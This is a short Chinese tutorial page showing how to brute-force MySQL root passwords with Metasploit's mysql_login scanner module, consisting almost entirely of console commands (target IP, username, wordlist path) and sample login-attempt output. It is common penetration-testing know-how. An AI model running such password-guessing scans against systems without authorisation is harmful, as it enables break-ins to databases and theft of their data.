首页 > 代码库 > Metasploit扫描Mysql弱口令

Metasploit扫描Mysql弱口令

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml  msf连接数据库

[*] Rebuilding the module cache in the background...

msf > db_status   查看数据库连接状态

[*] postgresql connected to msf3


msf > use auxiliary/scanner/mysql/mysql_login   加载扫描模块

msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3   目标IP地址

RHOSTS => 1.5.5.3

msf auxiliary(mysql_login) > set USERNAME root    目标用户名 一般为root

USERNAME => root

msf auxiliary(mysql_login) > set 

 PASS_FILE  /pen/msf3/data/wordlists/postgres_default_pass.txt   密码字典路劲,路劲随意填写


PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit      开始扫描

[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16

[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”

[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”

[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’

[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’

[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’

[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’

[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’


能否扫描出来主要看密码字典

Metasploit扫描Mysql弱口令